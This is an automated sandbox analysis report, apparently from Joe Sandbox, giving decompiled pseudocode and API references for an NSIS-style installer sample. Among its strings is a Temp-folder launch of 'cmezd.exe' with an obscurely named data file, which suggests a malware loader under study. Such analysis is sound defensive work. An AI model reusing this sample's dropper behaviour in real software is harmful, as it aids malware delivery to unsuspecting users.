						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}









                                                                                              0x00401faa
                                                                                              0x00401faf
                                                                                              0x00401fb5
                                                                                              0x00401fba
                                                                                              0x00401fbe
                                                                                              0x0040292e
                                                                                              0x00401fc4
                                                                                              0x00401fc7
                                                                                              0x00401fca
                                                                                              0x00401fd2
                                                                                              0x00401fe1
                                                                                              0x00401fe3
                                                                                              0x00401fe3
                                                                                              0x00401fd4
                                                                                              0x00401fd8
                                                                                              0x00401fd8
                                                                                              0x00401fd2
                                                                                              0x00401fea
                                                                                              0x00401feb
                                                                                              0x00401feb
                                                                                              0x00402c2d
                                                                                              0x00402c39

                                                                                              APIs
                                                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                                • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE ref: 00405C74
                                                                                                • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                                                                • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                                                                • Part of subcall function 00406AE0: GetExitCodeProcess.KERNELBASE ref: 00406B13
                                                                                                • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 2972824698-0
                                                                                              • Opcode ID: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                                                              • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                                                                                              • Opcode Fuzzy Hash: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                                                              • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Function 00405809 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 95%
                                                                                              			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429244;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423748;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42922c == _t156) {
							ShowWindow( *0x42a268, 8);
							if( *0x42a2ec == _t156) {
								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
							}
							E0040459D(_t171);
							goto L25;
						}
						 *0x421f18 = 2;
						E0040459D(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040462B(_a8, _a12, _a16);
						}
						ShowWindow( *0x429230, _t156);
						ShowWindow(_t169, 8);
						E004045F9(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a270;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429230 = GetDlgItem(_a4, 0x403);
				 *0x429228 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429244 = _t134;
				_v8 = _t134;
				E004045F9( *0x429230);
				 *0x429234 = E00404F52(4);
				 *0x42924c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045C4(_a4);
				if(( *0x42a278 & 0x00000003) != 0) {
					ShowWindow( *0x429230, _t156);
					if(( *0x42a278 & 0x00000002) != 0) {
						 *0x429230 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045F9( *0x429228);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a278 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

































                                                                                              0x00405811
                                                                                              0x00405817
                                                                                              0x00405821
                                                                                              0x00405824
                                                                                              0x004059ba
                                                                                              0x004059de
                                                                                              0x004059de
                                                                                              0x004059f1
                                                                                              0x00405a0f
                                                                                              0x00405a11
                                                                                              0x00405a19
                                                                                              0x00405a6f
                                                                                              0x00405a73
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405a75
                                                                                              0x00405a7b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405a85
                                                                                              0x00405a8d
                                                                                              0x00405a90
                                                                                              0x00405b92
                                                                                              0x00000000
                                                                                              0x00405b92
                                                                                              0x00405a9f
                                                                                              0x00405aaa
                                                                                              0x00405ab3
                                                                                              0x00405abe
                                                                                              0x00405ac1
                                                                                              0x00405aca
                                                                                              0x00405ad0
                                                                                              0x00405ad3
                                                                                              0x00405ad3
                                                                                              0x00405aeb
                                                                                              0x00405af4
                                                                                              0x00405af7
                                                                                              0x00405afe
                                                                                              0x00405b05
                                                                                              0x00405b0d
                                                                                              0x00405b0d
                                                                                              0x00405b24
                                                                                              0x00405b24
                                                                                              0x00405b2b
                                                                                              0x00405b31
                                                                                              0x00405b3d
                                                                                              0x00405b44
                                                                                              0x00405b4d
                                                                                              0x00405b4f
                                                                                              0x00405b52
                                                                                              0x00405b61
                                                                                              0x00405b64
                                                                                              0x00405b6a
                                                                                              0x00405b6b
                                                                                              0x00405b71
                                                                                              0x00405b72
                                                                                              0x00405b73
                                                                                              0x00405b7b
                                                                                              0x00405b86
                                                                                              0x00405b8c
                                                                                              0x00405b8c
                                                                                              0x00000000
                                                                                              0x00405aeb
                                                                                              0x00405a21
                                                                                              0x00405a51
                                                                                              0x00405a59
                                                                                              0x00405a64
                                                                                              0x00405a64
                                                                                              0x00405a6a
                                                                                              0x00000000
                                                                                              0x00405a6a
                                                                                              0x00405a25
                                                                                              0x00405a2f
                                                                                              0x00000000
                                                                                              0x004059f3
                                                                                              0x004059f9
                                                                                              0x00405a34
                                                                                              0x00000000
                                                                                              0x00405a3d
                                                                                              0x00405a02
                                                                                              0x00405a07
                                                                                              0x00405a0a
                                                                                              0x00000000
                                                                                              0x00405a0a
                                                                                              0x004059f1
                                                                                              0x0040582a
                                                                                              0x0040582e
                                                                                              0x00405836
                                                                                              0x0040583a
                                                                                              0x0040583d
                                                                                              0x00405840
                                                                                              0x00405843
                                                                                              0x00405846
                                                                                              0x00405847
                                                                                              0x00405848
                                                                                              0x00405861
                                                                                              0x00405864
                                                                                              0x0040586e
                                                                                              0x0040587d
                                                                                              0x00405885
                                                                                              0x0040588d
                                                                                              0x00405892
                                                                                              0x00405895
                                                                                              0x004058a1
                                                                                              0x004058aa
                                                                                              0x004058b3
                                                                                              0x004058d5
                                                                                              0x004058db
                                                                                              0x004058ec
                                                                                              0x004058f1
                                                                                              0x004058ff
                                                                                              0x0040590d
                                                                                              0x0040590d
                                                                                              0x00405912
                                                                                              0x00405920
                                                                                              0x00405920
                                                                                              0x00405925
                                                                                              0x00405928
                                                                                              0x0040592d
                                                                                              0x00405939
                                                                                              0x00405942
                                                                                              0x0040594f
                                                                                              0x0040595e
                                                                                              0x00405951
                                                                                              0x00405956
                                                                                              0x00405956
                                                                                              0x0040596a
                                                                                              0x0040596a
                                                                                              0x0040597e
                                                                                              0x00405987
                                                                                              0x00405990
                                                                                              0x004059a0
                                                                                              0x004059ac
                                                                                              0x004059ac
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetDlgItem.USER32 ref: 00405867
                                                                                              • GetDlgItem.USER32 ref: 00405876
                                                                                              • GetClientRect.USER32 ref: 004058B3
                                                                                              • GetSystemMetrics.USER32 ref: 004058BA
                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405956
                                                                                              • GetDlgItem.USER32 ref: 00405977
                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                                                                              • GetDlgItem.USER32 ref: 00405885
                                                                                                • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                              • GetDlgItem.USER32 ref: 004059C9
                                                                                              • CreateThread.KERNEL32 ref: 004059D7
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004059DE
                                                                                              • ShowWindow.USER32(00000000), ref: 00405A02
                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405A07
                                                                                              • ShowWindow.USER32(00000008), ref: 00405A51
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                                                                              • CreatePopupMenu.USER32 ref: 00405A96
                                                                                              • AppendMenuW.USER32 ref: 00405AAA
                                                                                              • GetWindowRect.USER32 ref: 00405ACA
                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                                                                              • OpenClipboard.USER32(00000000), ref: 00405B2B
                                                                                              • EmptyClipboard.USER32 ref: 00405B31
                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                                                                              • GlobalLock.KERNEL32 ref: 00405B47
                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405B86
                                                                                              • CloseClipboard.USER32 ref: 00405B8C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                              • String ID: H7B${
                                                                                              • API String ID: 590372296-2256286769
                                                                                              • Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                                                              • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                                                                              • Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                                                              • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404AB5 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 78%
                                                                                              			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422720;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CAC(0x3fb, _t146);
					E004068EF(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CAC(0x3fb, _t146);
							if(E0040603F(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406668(0x421718, _t146);
							_t87 = E00406A35(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406668(0x421718, _t146);
								_t89 = E00405FE2(0x421718);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x421718) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F83(0x421718);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x421718) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F52(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
									E00404F3A(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x421708);
									} else {
										E00404E71(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a304 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045E6(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423738 == _t158) {
									E00404A0E();
								}
								 *0x423738 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423748;
							_v60 = E00404E0B;
							_v56 = _t146;
							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F37(_t146);
								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\hardz\\AppData\\Local\\Temp") {
									E004066A5(_t146, 0x423748, _t167, 0, _t125);
									if(lstrcmpiW(0x428200, 0x423748) != 0) {
										lstrcatW(_t146, 0x428200);
									}
								}
								 *0x423738 =  *0x423738 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
						E00405F37(_t146);
					}
					 *0x429238 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004045C4(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045C4(_t167);
					E004045F9(_t166);
					_t138 = E00406A35(8);
					if(_t138 == 0) {
						L53:
						return E0040462B(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                                                                                              0x00404ab5
                                                                                              0x00404abb
                                                                                              0x00404ac1
                                                                                              0x00404ace
                                                                                              0x00404adc
                                                                                              0x00404adf
                                                                                              0x00404ae7
                                                                                              0x00404aed
                                                                                              0x00404aed
                                                                                              0x00404af9
                                                                                              0x00404afc
                                                                                              0x00404b6a
                                                                                              0x00404b71
                                                                                              0x00404c48
                                                                                              0x00404c4f
                                                                                              0x00404c5e
                                                                                              0x00404c5e
                                                                                              0x00404c62
                                                                                              0x00404c6c
                                                                                              0x00404c79
                                                                                              0x00404c7b
                                                                                              0x00404c7b
                                                                                              0x00404c89
                                                                                              0x00404c90
                                                                                              0x00404c97
                                                                                              0x00404c9a
                                                                                              0x00404cd6
                                                                                              0x00404cd8
                                                                                              0x00404cde
                                                                                              0x00404ce3
                                                                                              0x00404ce7
                                                                                              0x00404ce9
                                                                                              0x00404ce9
                                                                                              0x00404d05
                                                                                              0x00000000
                                                                                              0x00404d07
                                                                                              0x00404d0a
                                                                                              0x00404d18
                                                                                              0x00404d1e
                                                                                              0x00404d1f
                                                                                              0x00404d22
                                                                                              0x00404d25
                                                                                              0x00000000
                                                                                              0x00404d25
                                                                                              0x00404c9c
                                                                                              0x00404c9e
                                                                                              0x00404ca2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404ca4
                                                                                              0x00404ca4
                                                                                              0x00404cb1
                                                                                              0x00404cb6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404cba
                                                                                              0x00404cbc
                                                                                              0x00404cbc
                                                                                              0x00404cc5
                                                                                              0x00404cc7
                                                                                              0x00404ccc
                                                                                              0x00404ccf
                                                                                              0x00404cd4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404cd4
                                                                                              0x00404d31
                                                                                              0x00404d3b
                                                                                              0x00404d3e
                                                                                              0x00404d41
                                                                                              0x00404d48
                                                                                              0x00404d48
                                                                                              0x00404d4a
                                                                                              0x00404d4a
                                                                                              0x00404d4f
                                                                                              0x00404d51
                                                                                              0x00404d59
                                                                                              0x00404d60
                                                                                              0x00404d62
                                                                                              0x00404d6d
                                                                                              0x00404d6d
                                                                                              0x00404d62
                                                                                              0x00404d7d
                                                                                              0x00404d87
                                                                                              0x00404d8f
                                                                                              0x00404daa
                                                                                              0x00404d91
                                                                                              0x00404d9a
                                                                                              0x00404d9a
                                                                                              0x00404d8f
                                                                                              0x00404daf
                                                                                              0x00404db4
                                                                                              0x00404db9
                                                                                              0x00404dc2
                                                                                              0x00404dc2
                                                                                              0x00404dcb
                                                                                              0x00404dcd
                                                                                              0x00404dcd
                                                                                              0x00404dd9
                                                                                              0x00404de1
                                                                                              0x00404deb
                                                                                              0x00404deb
                                                                                              0x00404df0
                                                                                              0x00000000
                                                                                              0x00404df0
                                                                                              0x00404c9a
                                                                                              0x00404c51
                                                                                              0x00404c58
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404c58
                                                                                              0x00404b77
                                                                                              0x00404b80
                                                                                              0x00404b9a
                                                                                              0x00404b9f
                                                                                              0x00404ba9
                                                                                              0x00404bb0
                                                                                              0x00404bbc
                                                                                              0x00404bbf
                                                                                              0x00404bc2
                                                                                              0x00404bc9
                                                                                              0x00404bd1
                                                                                              0x00404bd4
                                                                                              0x00404bd8
                                                                                              0x00404bdf
                                                                                              0x00404be7
                                                                                              0x00404c41
                                                                                              0x00404be9
                                                                                              0x00404bea
                                                                                              0x00404bf1
                                                                                              0x00404bfb
                                                                                              0x00404c03
                                                                                              0x00404c10
                                                                                              0x00404c24
                                                                                              0x00404c28
                                                                                              0x00404c28
                                                                                              0x00404c24
                                                                                              0x00404c2d
                                                                                              0x00404c3a
                                                                                              0x00404c3a
                                                                                              0x00404be7
                                                                                              0x00000000
                                                                                              0x00404b9f
                                                                                              0x00404b8d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404b93
                                                                                              0x00000000
                                                                                              0x00404afe
                                                                                              0x00404b0b
                                                                                              0x00404b14
                                                                                              0x00404b21
                                                                                              0x00404b21
                                                                                              0x00404b28
                                                                                              0x00404b2e
                                                                                              0x00404b37
                                                                                              0x00404b3a
                                                                                              0x00404b3d
                                                                                              0x00404b45
                                                                                              0x00404b48
                                                                                              0x00404b4b
                                                                                              0x00404b51
                                                                                              0x00404b58
                                                                                              0x00404b5f
                                                                                              0x00404df6
                                                                                              0x00404e08
                                                                                              0x00404b65
                                                                                              0x00404b68
                                                                                              0x00000000
                                                                                              0x00404b68
                                                                                              0x00404b5f

                                                                                              APIs
                                                                                              • GetDlgItem.USER32 ref: 00404B04
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                                                                              • lstrcmpiW.KERNEL32("C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p,00423748,00000000,?,?), ref: 00404C1C
                                                                                              • lstrcatW.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p), ref: 00404C28
                                                                                              • SetDlgItemTextW.USER32 ref: 00404C3A
                                                                                                • Part of subcall function 00405CAC: GetDlgItemTextW.USER32 ref: 00405CBF
                                                                                                • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                                                • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                                                • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                                                • Part of subcall function 004068EF: CharPrevW.USER32(?,?,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                                              • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
